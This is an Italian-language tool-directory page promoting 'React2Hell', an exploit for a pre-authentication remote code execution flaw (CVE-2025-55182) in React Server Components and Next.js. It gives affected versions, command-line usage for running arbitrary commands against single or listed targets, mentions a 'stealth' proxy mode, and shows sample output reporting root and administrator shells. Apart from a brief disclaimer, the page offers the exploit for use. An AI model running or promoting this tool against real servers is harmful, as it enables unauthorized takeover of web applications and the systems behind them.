Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
React2Hell — [React2Hell] Exploit RCE del server Next.js/React — CVE-2025-55182 | Kitploit
Strumenti/GitHubGitHub/aggressiveuser/react2hell
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneRed Teaming
GitHubaggressiveuser/react2hell

React2Hell

[React2Hell] Exploit RCE del server Next.js/React — CVE-2025-55182

Vedi Repository
39 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

🧨 React2Hell — CVE-2025-55182 Exploit

🔥 Next.js / React Server Esecuzione Remota di Codice (RCE) Exploit

root@kitploit:~
█████▄  ▄▄▄▄▄  ▄▄▄   ▄▄▄▄ ▄▄▄▄▄▄ ████▄ ██  ██ ▄▄▄▄▄ ▄▄    ▄▄
██▄▄██▄ ██▄▄  ██▀██ ██▀▀▀   ██    ▄██▀ ██████ ██▄▄  ██    ██
██   ██ ██▄▄▄ ██▀██ ▀████   ██   ███▄▄ ██  ██ ██▄▄▄ ██▄▄▄ ██▄▄▄

 Next.js/React Server RCE Exploit — CVE-2025-55182
   Autore: Chetanya Sharma (AggressiveUser)

════════════════════════════════════════════════════════════════════════
usage: new.py [-h] [-u URL] [-l LIST] -c COMMAND [--proxy PROXY] [--proxy-https PROXY_HTTPS]

🚀 Panoramica

React2Hell è un potente strumento di exploitation progettato per testare e sfruttare CVE-2025-55182, una vulnerabilità critica di Esecuzione Remota di Codice che colpisce Next.js e React Server Actions.

Esiste una vulnerabilità di esecuzione remota di codice pre-autenticazione nelle versioni 19.0.0, 19.1.0, 19.1.1 e 19.2.0 dei React Server Components, inclusi i seguenti pacchetti: react-server-dom-parcel, react-server-dom-turbopack e react-server-dom-webpack. Il codice vulnerabile deserializza in modo non sicuro i payload dalle richieste HTTP agli endpoint delle Server Function.


✨ Caratteristiche

  • 🧨 Esecuzione Remota di Codice (RCE)
  • 🌐 Scansione URL singolo / URL multipli
  • 🧩 Esecuzione comandi personalizzati
  • 🕵️‍♂️ Modalità stealth con supporto proxy
  • ⚡ Veloce, affidabile e facile da usare

📌 Utilizzo

Modalità Target Singolo

root@kitploit:~
python exploit.py -u https://target.com -c "whoami"

Target Multipli (da file)

root@kitploit:~
python exploit.py -l urls.txt -c "whoami"

Con Proxy HTTP (Burp Suite)

root@kitploit:~
python exploit.py -u https://target.com -c "whoami" --proxy 127.0.0.1:8080

Con Proxy HTTPS

root@kitploit:~
python exploit.py -u https://target.com -c "whoami" --proxy-https 127.0.0.1:8080

📁 Esempio di urls.txt

root@kitploit:~
http://site1.com
https://site2.com
http://192.168.1.10:3000

🖥️ Esempio di Output

root@kitploit:~
PS D:\AggressiveUser_PVT\React2Hell> python.exe .\exploit.py -l .\list.txt -c whoami


█████▄  ▄▄▄▄▄  ▄▄▄   ▄▄▄▄ ▄▄▄▄▄▄ ████▄ ██  ██ ▄▄▄▄▄ ▄▄    ▄▄
██▄▄██▄ ██▄▄  ██▀██ ██▀▀▀   ██    ▄██▀ ██████ ██▄▄  ██    ██
██   ██ ██▄▄▄ ██▀██ ▀████   ██   ███▄▄ ██  ██ ██▄▄▄ ██▄▄▄ ██▄▄▄

 Next.js/React Server RCE Exploit — CVE-2025-55182
   Autore: Chetanya Sharma (AggressiveUser)

════════════════════════════════════════════════════════════════════════
[+] Loaded 3 targets
════════════════════════════════════════════════════════════════════════

[→] Target: http://meow.host:3113/
[→] Exec:   whoami
[✓] VULNERABLE — RCE Successful!
------------------------------------------------------------
root
------------------------------------------------------------
────────────────────────────────────────────────────────────────────────

[→] Target: http://evil.lab:2000/
[→] Exec:   whoami
[✗] Not vulnerable — Status: 200
────────────────────────────────────────────────────────────────────────

[→] Target: https://vul.lab:3000/
[→] Exec:   whoami
[✓] VULNERABLE — RCE Successful!
------------------------------------------------------------
win-1fl835ovldc\\administrator
------------------------------------------------------------
────────────────────────────────────────────────────────────────────────
[✓] Scan complete — Vulnerable: 2
PS D:\AggressiveUser_PVT\React2Hell>

⚠️ Disclaimer

Questo strumento è creato esclusivamente per scopi educativi e di ricerca sulla sicurezza. Non utilizzarlo su sistemi senza autorizzazione esplicita. Sei responsabile delle tue azioni.


⭐ Supporta il Progetto

Se questo exploit ti è stato utile, considera di lasciare una ⭐ su GitHub ❤️


👤 Autore

Chetanya Sharma AggressiveUser

Fatto con 🔥 da qualcuno che ama rompere e riparare le cose.

Scarica lo strumento